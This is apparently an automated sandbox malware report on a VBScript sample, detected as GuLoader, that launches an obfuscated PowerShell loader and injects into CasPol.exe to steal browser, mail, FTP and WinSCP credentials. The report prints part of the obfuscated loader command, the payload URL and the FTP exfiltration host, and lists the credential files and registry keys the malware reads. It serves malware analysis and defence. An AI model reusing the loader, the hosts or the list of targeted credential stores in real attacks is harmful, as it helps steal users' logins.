          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skolegaardene = """reabedsaddi-fitgeysjpsyean de-chtheytepaneladreeopfprinonmiiprtsainooscnka da'kourisfoiudnmygsy sysimyinsofttretumok;suustsnyisunbigdr trsmiyassdatdeeprmti.dormiumansotcoigamduebi.boiannsotpheoprinoudptesdeeomrgovstiknctredesfo;oppsiupabfolvaiafcgl elsshtfiabathvicocot dacunlryadzsspsor sirchepraudbstrgiisidadgpaenodat1ch in{cr[fjddrladlsqihemtapkoobervatde(ne`"""sowowihansamblmba.dedsalbalin`"""bi)sg]koppeuasbfolunihocmy prsgrtunasetinistcsi haenexsktbreporfenge uniunnartma homcaimbdsaisuotjulgtnoozipfoejrnxs(smiornbutbr pokprvabatalmoibe,tiigansatth brkatovinte,zailunditad korruiovnpegsaeatdth,rribantrtde spuounpywfoohe,hoiknngetha kouwidgrere)co;as[mudtulallreithmnopblobrrfitne(ud`"""sekuneserobnomebilhl3up2te`"""he)av]riparufuboclfiicucma assemtsaadrtapifrctu raestxditkievermenpr jiifanovtlo arlmoopecviaaulprsunhcarpoihunsvkde(ouiunnhitst resdycpuounrtupgribr,whivendotst stnsasfikovematimnup)eu;fg[gudhylanlfuipemafpleowirmutra(kh`"""vekbieemradnpueanlnl3ek2bl`"""sp)pe]repgeurebprlreiracst desbettaamatfiifocom shefaxpitdieunrtanko blisunkatke scsarecatancudomombomsisditcaazatamere(unismnextse cokcuobefaltsmaaf,naiafnlatsu scslatkaohorhortrybu)sk;kr[lidstlimlcuihomekptaorkrbrtsh(pu`"""pskfeeskrannopeunlbi3sp2ut`"""va)gr]goporupabovlupishcsu vesbetlaaistptisncen puebuxagtcoeunrcanue alimonvetce trhleesaaslpjacdyrsiediaafttiedr(iligrnudten scndoedocwirhiosapbe,biivonsitdo gafselafsfnkpr,iniinnantos mogsirspufiple)al;sy[brduplablseipomsupteobarbltgl(af`"""prkcoexerbanfleaflsy3br2ma`"""un)tr]hepnaunobcolulirecud srsdettharotkuiiscph grebexfrtgeesprminvi ciifinwotde stvfaipsrzotthumiaoplstaarlunlagogrcbo(daisansytaf eqvep1sy,hoidenoxtst unvme2be,trikonkotro skvfl3wi,foimongatfi stvmi4ch)be;tu[padatlbglopikomphplaobarsptwa(ma`"""thijamremde3ba2vi.hedsolsalba`"""fe)br]sepluuenbafldeihocsk lushytviaantkoipoczr noedrxurtclefardonbl heibanbrtxe hviblmrhmagskredetevsmatfiaratuduansduwanirunkeddioopwtrpbroanspu(coiunnditba neppoasklskaen,chirenxetal skrpyainzne)me;bi[vadrelrhlanisemifpouochrfrtde(ti`"""omahydwivreafapgriph3sn2mi.spdnilpllvu`"""ep)un]vepclussbgelreiafcfl drslgtmiaertpaiopcna shesixcytopegerbensu unistntitak baisnntrisotmaiscagrlpaiejzcoeanakactalbe(poipunhntru tectioaclba,aaisynmetmi leupindeapr,afimenretas fafmelfroteporpol2na0ma1sn)mi;in[dedsalpalslichmnoperophreutsc(pa`"""engsvdtaiol3re2so`"""ud)qu]fiphyuskbadlmaigucgi ocsudtlaamotreifrcsk ijewixaxtqueunrhanbo geicinmatsa husseeratbewedilinbldenomewfuepexnotbrestxpl(slisannvtge biddaudacfl,buityncetto udhtoelanhubhuldy,anibenoutti moskuibrdraecotcaafo,isitinthtub afaulpfrpisatosis)pa;uf[audtilcalafiscmbapomoikrhetom(un`"""mygprdalipa3an2tr`"""un)th]ropjoucebmalfliblcbl agslrtpyabethjicocul taevoxfotafenoralnby coiaunittha nautrnnorigegeakelnoivazanestosjbenjsieopcfrtun(leihjnuntki rvhnoobiwbeeframanhe)su;sp[caddiludlplibemfrpnooegrditde(ce`"""coudesag
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: Yara match | File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 1 Access Token Manipulation | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Exfiltration Over Alternative Protocol | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | 421 Scripting | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 115 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | 1 Native API | Logon Script (Windows) | Logon Script (Windows) | 421 Scripting | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | 21 Command and Scripting Interpreter | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 22 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
          Cloud Accounts | 1 PowerShell | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 231 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 231 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
          Behavior Graph ID: 755115 | Sample: Richiesta urgente.vbs | Startdate: 28/11/2022 | Architecture: WINDOWS | Score: 100
          Start signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Yara detected GuLoader; 5 other signatures
          wscript.exe (1 1) started
            signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
            powershell.exe (23) started
              dropped: C:\Users\user\AppData\...\2vgl23kr.cmdline, Unicode
              signatures: Tries to detect Any.run
              CasPol.exe (15 11) started
                dnsIp: qwedft.gq 162.240.62.179, 49709, 80 UNIFIEDLAYER-AS-1US United States; ftp.mcmprint.net 185.31.121.136, 21, 49711 RAX-ASBG Bulgaria
                signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures
              csc.exe (3) started
                dropped: C:\Users\user\AppData\Local\...\2vgl23kr.dll, PE32
                cvtres.exe (1) started
              conhost.exe started
            cmd.exe (1) started
              conhost.exe started

          No Antivirus matches
Source | Detection | Scanner | Label | Link
ftp.mcmprint.net | 10% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://crl.m | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe |
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://crl.micr | 0% | URL Reputation | safe |
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe |
http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi | 0% | Avira URL Cloud | safe |
http://3LpbHlMRrrHdHc2KU.net | 0% | Avira URL Cloud | safe |
http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi | 0% | Virustotal | | Browse
ftp://ftp.mcmprint.netnoffice | 0% | Avira URL Cloud | safe |
http://OowQOv.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
qwedft.gq | 162.240.62.179 | true | false | | unknown
ftp.mcmprint.net | 185.31.121.136 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://3LpbHlMRrrHdHc2KU.net | CasPol.exe, 0000000A.00000002.836359577.000000001DBDA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.836857074.000000001DC27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.734109094.0000000001621000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000002.751015129.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
ftp://ftp.mcmprint.netnoffice | CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://OowQOv.com | CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micr | powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.727863466.0000000004761000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.240.62.179 | qwedft.gq | United States | 46606 | UNIFIEDLAYER-AS-1US | false
185.31.121.136 | ftp.mcmprint.net | Bulgaria | 199364 | RAX-ASBG | false
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 755115
Start date and time: 2022-11-28 11:04:10 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 36s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Richiesta urgente.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
EGA Information:
• Successful, ratio: 50%
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .vbs
• Override analysis time to 240s for JS/VBS files not yet terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): client.wns.windows.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com
• Execution Graph export aborted for target powershell.exe, PID 5840 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
11:06:40 | API Interceptor | 39x Sleep call for process: powershell.exe modified
11:08:20 | API Interceptor | 396x Sleep call for process: CasPol.exe modified
                      No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.839308921501875
Encrypted: false
SSDEEP: 192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
MD5: 937C6E940577634844311E349BD4614D
SHA1: 379440E933201CD3E6E6BF9B0E61B7663693195F
SHA-256: 30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
SHA-512: 6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
Malicious: false
Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (1303), with no line terminators
Category: dropped
Size (bytes): 1306
Entropy (8bit): 4.96457254634036
Encrypted: false
SSDEEP: 24:JVSVlyvpuyG8wEyQhnPd3ywbfSoGGPc+c6haG+fgnH:JVOlu4ywE3hPd39+oGGPc+c6haG+onH
MD5: 63200708319CC8C999DE12FF4CD3FA3E
SHA1: 36DDB69CCD4FF5D22013234C44EACD3EE4D04C78
SHA-256: 4D4CE4254F2AB3D55A232F63A523A46D9835F094A2D0211E748CA449688D03EA
SHA-512: A9F1350B335519CD01449B25B2FF4E0C62D746EA221BD6939522468772A4FBA88CAA2667088C19C376A6B1969FE4576C37A356A97CAFF30EE889BB039733E4EB
Malicious: false
